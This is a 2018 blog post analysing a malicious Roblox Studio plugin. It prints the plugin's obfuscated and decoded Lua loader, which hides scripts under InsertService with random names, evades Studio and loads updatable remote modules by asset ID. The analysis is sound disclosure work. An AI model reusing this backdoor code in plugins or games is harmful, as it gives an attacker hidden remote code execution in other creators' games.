<!DOCTYPE html>
<html>

<head>

<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=yes">
<title>Decoding a malicious Roblox plugin</title>


<style type="text/css">
h1,
h2,
h3,
h4,
h5,
h6,
p,
blockquote {
    margin: 0;
    padding: 0;
}
body {
    font-family: "Menlo", Helvetica, "Hiragino Sans GB", Arial, sans-serif;
    font-size: 13px;
    line-height: 18px;
    color: #fff;
    background-color: #282a36;
    margin: 10px 13px 10px 13px;
}
table {
	margin: 10px 0 15px 0;
	border-collapse: collapse;
}
td,th {
	border: 1px solid #ddd;
	padding: 3px 10px;
}
th {
	padding: 5px 10px;
}
a {
    color: #59acf3;
}
a:hover {
    color: #a7d8ff;
    text-decoration: none;
}
a img {
    border: none;
}
p {
    margin-bottom: 9px;
}
h1,
h2,
h3,
h4,
h5,
h6 {
    color: #fff;
    line-height: 36px;
}
h1 {
    margin-bottom: 18px;
    font-size: 30px;
}
h2 {
    font-size: 24px;
}
h3 {
    font-size: 18px;
}
h4 {
    font-size: 16px;
}
h5 {
    font-size: 14px;
}
h6 {
    font-size: 13px;
}
hr {
    margin: 0 0 19px;
    border: 0;
    border-bottom: 1px solid #ccc;
}
blockquote {
    padding: 13px 13px 21px 15px;
    margin-bottom: 18px;
    font-family:georgia,serif;
    font-style: italic;
}
blockquote:before {
    content:"\201C";
    font-size:40px;
    margin-left:-10px;
    font-family:georgia,serif;
    color:#eee;
}
blockquote p {
    font-size: 14px;
    font-weight: 300;
    line-height: 18px;
    margin-bottom: 0;
    font-style: italic;
}
code, pre {
    font-family: Monaco, Andale Mono, Courier New, monospace;
}
code {
	color: #ff4a14;
    padding: 1px 3px;
    font-size: 12px;
    -webkit-border-radius: 3px;
    -moz-border-radius: 3px;
    border-radius: 3px;
}
pre {
    display: block;
    padding: 14px;
    margin: 0 0 18px;
    line-height: 16px;
    font-size: 11px;
    border: 1px solid #bf370f;
    white-space: pre;
    white-space: pre-wrap;
    word-wrap: break-word;
}
pre code {
    background-color: #282a36;
    color: #ff4a14;
    font-size: 11px;
    padding: 0;
}
sup {
    font-size: 0.83em;
    vertical-align: super;
    line-height: 0;
}
kbd {
  display: inline-block;
  padding: 3px 5px;
  font-size: 11px;
  line-height: 10px;
  color: #555;
  vertical-align: middle;
  background-color: #fcfcfc;
  border: solid 1px #ccc;
  border-bottom-color: #bbb;
  border-radius: 3px;
  box-shadow: inset 0 -1px 0 #bbb;
}
* {
	-webkit-print-color-adjust: exact;
}
@media screen and (min-width: 914px) {
    body {
        width: 854px;
        margin:10px auto;
    }
}
@media print {
	body,code,pre code,h1,h2,h3,h4,h5,h6 {
		color: black;
	}
	table, pre {
		page-break-inside: avoid;
	}
}
</style>

<style type="text/css">
/**
 * prism.js tomorrow night eighties for JavaScript, CoffeeScript, CSS and HTML
 * Based on https://github.com/chriskempson/tomorrow-theme
 * @author Rose Pritchard
 */

code[class*="language-"],
pre[class*="language-"] {
	color: #ccc;
	background: none;
	font-family: Consolas, Monaco, 'Andale Mono', 'Ubuntu Mono', monospace;
	text-align: left;
	white-space: pre;
	word-spacing: normal;
	word-break: normal;
	word-wrap: normal;
	line-height: 1.5;

	-moz-tab-size: 4;
	-o-tab-size: 4;
	tab-size: 4;

	-webkit-hyphens: none;
	-moz-hyphens: none;
	-ms-hyphens: none;
	hyphens: none;

}

/* Code blocks */
pre[class*="language-"] {
	padding: 1em;
	margin: .5em 0;
	overflow: auto;
}

:not(pre) > code[class*="language-"],
pre[class*="language-"] {
	background: #2d2d2d;
}

/* Inline code */
:not(pre) > code[class*="language-"] {
	padding: .1em;
	border-radius: .3em;
	white-space: normal;
}

.token.comment,
.token.block-comment,
.token.prolog,
.token.doctype,
.token.cdata {
	color: #999;
}

.token.punctuation {
	color: #ccc;
}

.token.tag,
.token.attr-name,
.token.namespace,
.token.deleted {
	color: #e2777a;
}

.token.function-name {
	color: #6196cc;
}

.token.boolean,
.token.number,
.token.function {
	color: #f08d49;
}

.token.property,
.token.class-name,
.token.constant,
.token.symbol {
	color: #f8c555;
}

.token.selector,
.token.important,
.token.atrule,
.token.keyword,
.token.builtin {
	color: #cc99cd;
}

.token.string,
.token.char,
.token.attr-value,
.token.regex,
.token.variable {
	color: #7ec699;
}

.token.operator,
.token.entity,
.token.url {
	color: #67cdcc;
}

.token.important,
.token.bold {
	font-weight: bold;
}
.token.italic {
	font-style: italic;
}

.token.entity {
	cursor: help;
}

.token.inserted {
	color: green;
}
</style>


</head>

<body>

<h1 id="toc_0">Decoding a malicious Roblox plugin</h1>

<h2 id="toc_1">19/12/2018 - <a href="https://thelmgn.com">theLMGN</a></h2>

<p>So, recently I found <a href="https://www.roblox.com/library/2644964449/Class-Converter">this</a>, it looked pretty useful as a thing. But I&#39;d heard as of viruses being spread as Roblox plugins, so I decided to crack it open and download the original source code. (grab the plugin id and then go to <a href="https://roblox.com/asset?id=%7Bpluginid%7D">https://roblox.com/asset?id={pluginid}</a>, rename that to a RBXL file and open in Studio)</p>

<p><img src="https://lmgn.uk/WFZ0Ov.png" alt="image"></p>

<p>There is nothing obvious in sight, however I decided to open the file named <a href="https://gist.github.com/theLMGN/c206dc874ed858be19ca009fae5219e1#file-set-lua"><code>SET</code></a>, It was some strange LUA opcode alien script. I printed the data with the built in Roblox console, but however all I managed to extract from this was the word <q>LuaQ</q>, Googled this and saw that it was LuaC, I created a small Node.JS script to convert this into an actual LuaC file, not just ASCII codes. <a href="https://gist.github.com/theLMGN/c206dc874ed858be19ca009fae5219e1#file-set-luac">You can see the converted LuaC in the same Gist</a>, It appeared to be actual, readable code. It had some wierd strings, and something called a <q>bphide</q> parented to the InsertService, this 100% is a trick to hide the scripts inside, due to the user not being able to see the InsertService in normal Studio usage, and is still pushed to Roblox servers. In the code there is also the name of a Roblox user NotAshley, I sent them a Roblox PM about this</p>

<p><img src="https://lmgn.uk/wjExdH.png" alt="image"></p>

<p>Interestingly, a name of a group called <q>Fyre_Studios</q>, I haven&#39;t found out what this is, any info, message me. The script is just another LuaC decoder, just with more interesting things.</p>

<h2 id="toc_2">Alright, lets get to the meat of the virus</h2>

<div><pre><code class="language-lua">    bphide = Instance.new(&quot;Backpack&quot;, game:GetService(&quot;InsertService&quot;))
bphide.Name = math.random(3, 5) .. rndname[math.random(#rndname)] .. math.random(1, 30000) .. rndname[math.random(#rndname)] .. rndname[math.random(#rndname)] .. rndname[math.random(#rndname)]
scrip = Instance.new(&quot;Script&quot;, bphide)
scripobfrequire = math.random(1, 400000)
scriptreqcode = 7.0493265740554e+18
scriptreqcode = (scriptreqcode + scripobfrequire) ^ 2
scrip.Source = &quot;\115\112\97\119\110\40\102\117\110\99\116\105\111\110\40\41\103\97\109\101\58\87\97\105\116\70\111\114\67\104\105\108\100\40\39\92\56\51\92\49\48\49\92\49\49\52\92\49\49\56\92\49\48\49\92\49\49\52\92\56\51\92\57\57\92\49\49\52\92\49\48\53\92\49\49\50\92\49\49\54\92\56\51\92\49\48\49\92\49\49\52\92\49\49\56\92\49\48\53\92\57\57\92\49\48\49\39\41\105\102\32\103\97\109\101\58\71\101\116\83\101\114\118\105\99\101\40\39\92\56\55\92\49\49\49\92\49\49\52\92\49\48\55\92\49\49\53\92\49\49\50\92\57\55\92\57\57\92\49\48\49\39\41\46\84\101\114\114\97\105\110\58\70\105\110\100\70\105\114\115\116\67\104\105\108\100\40\39\92\54\55\92\57\55\92\49\48\56\92\49\48\56\92\55\48\39\41\116\104\101\110\32\114\101\116\117\114\110\32\101\110\100\59\105\102\32\103\97\109\101\58\71\101\116\83\101\114\118\105\99\101\40\39\92\56\50\92\49\49\55\92\49\49\48\92\56\51\92\49\48\49\92\49\49\52\92\49\49\56\92\49\48\53\92\57\57\92\49\48\49\39\41\58\73\115\83\116\117\100\105\111\40\41\116\104\101\110\32\114\101\116\117\114\110\32\101\110\100\59\112\99\97\108\108\40\102\117\110\99\116\105\111\110\40\41\114\101\113\117\105\114\101\40\109\97\116\104\46\115\113\114\116\40\109\97\116\104\46\115\113\114\116\40&quot; .. scriptreqcode .. &quot;\41\32\45\32&quot; .. scripobfrequire .. &quot;)).load(game.PlaceId)end)end)&quot;
scrip.Disabled = false
scrip.Name = math.random(3, 5) .. rndname[math.random(#rndname)] .. math.random(1, 30000) .. rndname[math.random(#rndname)] .. rndname[math.random(#rndname)] .. rndname[math.random(#rndname)]

extr = Instance.new(&quot;Script&quot;, bphide)
extr.Source = &quot;marketplaceService = game:GetService(&#39;MarketplaceService&#39;) productInfo = marketplaceService:GetProductInfo(2655062037) modulefunc = productInfo.Description modulefunc = tonumber(string.match(modulefunc, &#39;%d+&#39;)) require(modulefunc)[tostring(productInfo.Name)](game.PlaceId)&quot;
extr.Disabled = false
extr.Name = math.random(3, 5) .. rndname[math.random(#rndname)] .. math.random(1, 30000) .. rndname[math.random(#rndname)] .. rndname[math.random(#rndname)] .. rndname[math.random(#rndname)]

pcall(function()
    bphide.Parent = game[&quot;\67\83\71\68\105\99\116\105\111\110\97\114\121\83\101\114\118\105\99\101&quot;]
end)end
</code></pre></div>

<p>Let&#39;s analyze this in chunks shall we?</p>

<h3 id="toc_3">Hiding our traces.</h3>

<div><pre><code class="language-lua">bphide = Instance.new(&quot;Backpack&quot;, game:GetService(&quot;InsertService&quot;))
bphide.Name = math.random(3, 5) .. rndname[math.random(#rndname)] .. math.random(1, 30000) .. rndname[math.random(#rndname)] .. rndname[math.random(#rndname)] .. rndname[math.random(#rndname)]</code></pre></div>

<p>This code snippet creates a hidden backpack element in the <q>InsertService</q>, something that isn&#39;t shown to users.</p>

<h3 id="toc_4">Injecting our virus</h3>

<div><pre><code class="language-lua">scrip = Instance.new(&quot;Script&quot;, bphide)
scripobfrequire = math.random(1, 400000)
scriptreqcode = 7.0493265740554e+18
scriptreqcode = (scriptreqcode + scripobfrequire) ^ 2
scrip.Source = &quot;spawn(function()game:WaitForChild(&#39;ServerScriptService&#39;)if game:GetService(&#39;Workspace&#39;).Terrain:FindFirstChild(&#39;CallF&#39;)then return end;if game:GetService(&#39;RunService&#39;):IsStudio()then return end;pcall(function()require(math.sqrt(math.sqrt(&quot; .. scriptreqcode .. &quot;) - &quot; .. scripobfrequire .. &quot;)).load(game.PlaceId)end)end)&quot;
scrip.Disabled = false
scrip.Name = math.random(3, 5) .. rndname[math.random(#rndname)] .. math.random(1, 30000) .. rndname[math.random(#rndname)] .. rndname[math.random(#rndname)] .. rndname[math.random(#rndname)]</code></pre></div>

<p>This creates a hidden script element, a random number between 1,400000 (for easiness sake, lets use 200000) and 7049326574055400000, adds them together and squares them.
The <code>scrip.source</code> is really what we&#39;re looking for, it&#39;s obfuscated, so lets deobfuscate it shall we?</p>

<div><pre><code class="language-lua">spawn(function()
    game:WaitForChild(&#39;ServerScriptService&#39;)
    if game:GetService(&#39;Workspace&#39;).Terrain:FindFirstChild(&#39;CallF&#39;) then
        return
    end
    if game:GetService(&#39;RunService&#39;):IsStudio() then
        return 
    end
    pcall(function()
        require(math.sqrt(math.sqrt(scriptreqcode) - scripobfrequire)).load(game.PlaceId)
    end)
end)</code></pre></div>

<p>The first line is just waiting for the game to be loaded. The next 6 are just stopping if there is something called <code>CallF</code> in the game&#39;s Terrain object and stopping the script if it&#39;s running in Roblox Studio (to prevent <q>Cannot find module ID</q> errors blowing our cover since closed source modules can&#39;t be downloaded in Studio)</p>

<p>It&#39;s the next 3 lines that really peak my interest. <code>pcall</code> is just Lua&#39;s version of a <code>try catch</code> block. The mathsie bit doesn&#39;t really need explaining so, it just returns the square root fo our <code>7.0493265740554e+18</code>, which is 2655056793, which is of course a closed source module, hurray! All for nothing! <a href="https://www.roblox.com/library/2655056793/Settings">https://www.roblox.com/library/2655056793/Settings</a></p>

<h3 id="toc_5">Loading a junk function</h3>

<div><pre><code class="language-lua">    extr = Instance.new(&quot;Script&quot;, bphide)
    extr.Source = &quot;
        marketplaceService = game:GetService(&#39;MarketplaceService&#39;)
        productInfo = marketplaceService:GetProductInfo(2655062037)
        modulefunc = productInfo.Description
        modulefunc = tonumber(string.match(modulefunc, &#39;%d+&#39;))
        require(modulefunc)[tostring(productInfo.Name)](game.PlaceId)&quot;
    extr.Disabled = false
    extr.Name = math.random(3, 5) .. rndname[math.random(#rndname)] .. math.random(1, 30000) .. rndname[math.random(#rndname)] .. rndname[math.random(#rndname)] .. rndname[math.random(#rndname)]</code></pre></div>

<p>The module loaded at the end is just a junk module, however can be updated at any time to something more nefarious</p>

<div><pre><code class="language-lua">local module = {}

module.none = function() -- This is the function that gets called by the code above
    return
end

module.testload = function()
    print(&quot;XD&quot;)
end

return module</code></pre></div>



<script type="text/javascript">
var _self="undefined"!=typeof window?window:"undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?self:{},Prism=function(){var e=/\blang(?:uage)?-(\w+)\b/i,t=0,n=_self.Prism={util:{encode:function(e){return e instanceof a?new a(e.type,n.util.encode(e.content),e.alias):"Array"===n.util.type(e)?e.map(n.util.encode):e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/\u00a0/g," ")},type:function(e){return Object.prototype.toString.call(e).match(/\[object (\w+)\]/)[1]},objId:function(e){return e.__id||Object.defineProperty(e,"__id",{value:++t}),e.__id},clone:function(e){var t=n.util.type(e);switch(t){case"Object":var a={};for(var r in e)e.hasOwnProperty(r)&&(a[r]=n.util.clone(e[r]));return a;case"Array":return e.map&&e.map(function(e){return n.util.clone(e)})}return e}},languages:{extend:function(e,t){var a=n.util.clone(n.languages[e]);for(var r in t)a[r]=t[r];return a},insertBefore:function(e,t,a,r){r=r||n.languages;var l=r[e];if(2==arguments.length){a=arguments[1];for(var i in a)a.hasOwnProperty(i)&&(l[i]=a[i]);return l}var o={};for(var s in l)if(l.hasOwnProperty(s)){if(s==t)for(var i in a)a.hasOwnProperty(i)&&(o[i]=a[i]);o[s]=l[s]}return n.languages.DFS(n.languages,function(t,n){n===r[e]&&t!=e&&(this[t]=o)}),r[e]=o},DFS:function(e,t,a,r){r=r||{};for(var l in e)e.hasOwnProperty(l)&&(t.call(e,l,e[l],a||l),"Object"!==n.util.type(e[l])||r[n.util.objId(e[l])]?"Array"!==n.util.type(e[l])||r[n.util.objId(e[l])]||(r[n.util.objId(e[l])]=!0,n.languages.DFS(e[l],t,l,r)):(r[n.util.objId(e[l])]=!0,n.languages.DFS(e[l],t,null,r)))}},plugins:{},highlightAll:function(e,t){var a={callback:t,selector:'code[class*="language-"], [class*="language-"] code, code[class*="lang-"], [class*="lang-"] code'};n.hooks.run("before-highlightall",a);for(var r,l=a.elements||document.querySelectorAll(a.selector),i=0;r=l[i++];)n.highlightElement(r,e===!0,a.callback)},highlightElement:function(t,a,r){for(var l,i,o=t;o&&!e.test(o.className);)o=o.parentNode;o&&(l=(o.className.match(e)||[,""])[1],i=n.languages[l]),t.className=t.className.replace(e,"").replace(/\s+/g," ")+" language-"+l,o=t.parentNode,/pre/i.test(o.nodeName)&&(o.className=o.className.replace(e,"").replace(/\s+/g," ")+" language-"+l);var s=t.textContent,u={element:t,language:l,grammar:i,code:s};if(!s||!i)return n.hooks.run("complete",u),void 0;if(n.hooks.run("before-highlight",u),a&&_self.Worker){var c=new Worker(n.filename);c.onmessage=function(e){u.highlightedCode=e.data,n.hooks.run("before-insert",u),u.element.innerHTML=u.highlightedCode,r&&r.call(u.element),n.hooks.run("after-highlight",u),n.hooks.run("complete",u)},c.postMessage(JSON.stringify({language:u.language,code:u.code,immediateClose:!0}))}else u.highlightedCode=n.highlight(u.code,u.grammar,u.language),n.hooks.run("before-insert",u),u.element.innerHTML=u.highlightedCode,r&&r.call(t),n.hooks.run("after-highlight",u),n.hooks.run("complete",u)},highlight:function(e,t,r){var l=n.tokenize(e,t);return a.stringify(n.util.encode(l),r)},tokenize:function(e,t){var a=n.Token,r=[e],l=t.rest;if(l){for(var i in l)t[i]=l[i];delete t.rest}e:for(var i in t)if(t.hasOwnProperty(i)&&t[i]){var o=t[i];o="Array"===n.util.type(o)?o:[o];for(var s=0;s<o.length;++s){var u=o[s],c=u.inside,g=!!u.lookbehind,h=!!u.greedy,f=0,d=u.alias;u=u.pattern||u;for(var p=0;p<r.length;p++){var m=r[p];if(r.length>e.length)break e;if(!(m instanceof a)){u.lastIndex=0;var y=u.exec(m),v=1;if(!y&&h&&p!=r.length-1){var b=r[p+1].matchedStr||r[p+1],k=m+b;if(p<r.length-2&&(k+=r[p+2].matchedStr||r[p+2]),u.lastIndex=0,y=u.exec(k),!y)continue;var w=y.index+(g?y[1].length:0);if(w>=m.length)continue;var _=y.index+y[0].length,P=m.length+b.length;if(v=3,P>=_){if(r[p+1].greedy)continue;v=2,k=k.slice(0,P)}m=k}if(y){g&&(f=y[1].length);var w=y.index+f,y=y[0].slice(f),_=w+y.length,S=m.slice(0,w),O=m.slice(_),j=[p,v];S&&j.push(S);var A=new a(i,c?n.tokenize(y,c):y,d,y,h);j.push(A),O&&j.push(O),Array.prototype.splice.apply(r,j)}}}}}return r},hooks:{all:{},add:function(e,t){var a=n.hooks.all;a[e]=a[e]||[],a[e].push(t)},run:function(e,t){var a=n.hooks.all[e];if(a&&a.length)for(var r,l=0;r=a[l++];)r(t)}}},a=n.Token=function(e,t,n,a,r){this.type=e,this.content=t,this.alias=n,this.matchedStr=a||null,this.greedy=!!r};if(a.stringify=function(e,t,r){if("string"==typeof e)return e;if("Array"===n.util.type(e))return e.map(function(n){return a.stringify(n,t,e)}).join("");var l={type:e.type,content:a.stringify(e.content,t,r),tag:"span",classes:["token",e.type],attributes:{},language:t,parent:r};if("comment"==l.type&&(l.attributes.spellcheck="true"),e.alias){var i="Array"===n.util.type(e.alias)?e.alias:[e.alias];Array.prototype.push.apply(l.classes,i)}n.hooks.run("wrap",l);var o="";for(var s in l.attributes)o+=(o?" ":"")+s+'="'+(l.attributes[s]||"")+'"';return"<"+l.tag+' class="'+l.classes.join(" ")+'" '+o+">"+l.content+"</"+l.tag+">"},!_self.document)return _self.addEventListener?(_self.addEventListener("message",function(e){var t=JSON.parse(e.data),a=t.language,r=t.code,l=t.immediateClose;_self.postMessage(n.highlight(r,n.languages[a],a)),l&&_self.close()},!1),_self.Prism):_self.Prism;var r=document.currentScript||[].slice.call(document.getElementsByTagName("script")).pop();return r&&(n.filename=r.src,document.addEventListener&&!r.hasAttribute("data-manual")&&document.addEventListener("DOMContentLoaded",n.highlightAll)),_self.Prism}();"undefined"!=typeof module&&module.exports&&(module.exports=Prism),"undefined"!=typeof global&&(global.Prism=Prism);
</script>

<script type="text/javascript">
Prism.languages.lua={comment:/^#!.+|--(?:\[(=*)\[[\s\S]*?\]\1\]|.*)/m,string:/(["'])(?:(?!\1)[^\\\r\n]|\\z(?:\r\n|\s)|\\(?:\r\n|[\s\S]))*\1|\[(=*)\[[\s\S]*?\]\2\]/,number:/\b0x[a-f\d]+\.?[a-f\d]*(?:p[+-]?\d+)?\b|\b\d+(?:\.\B|\.?\d*(?:e[+-]?\d+)?\b)|\B\.\d+(?:e[+-]?\d+)?\b/i,keyword:/\b(?:and|break|do|else|elseif|end|false|for|function|goto|if|in|local|nil|not|or|repeat|return|then|true|until|while)\b/,"function":/(?!\d)\w+(?=\s*(?:[({]))/,operator:[/[-+*%^&|#]|\/\/?|<[<=]?|>[>=]?|[=~]=?/,{pattern:/(^|[^.])\.\.(?!\.)/,lookbehind:!0}],punctuation:/[\[\](){},;]|\.+|:+/};
</script>


</body>

</html>
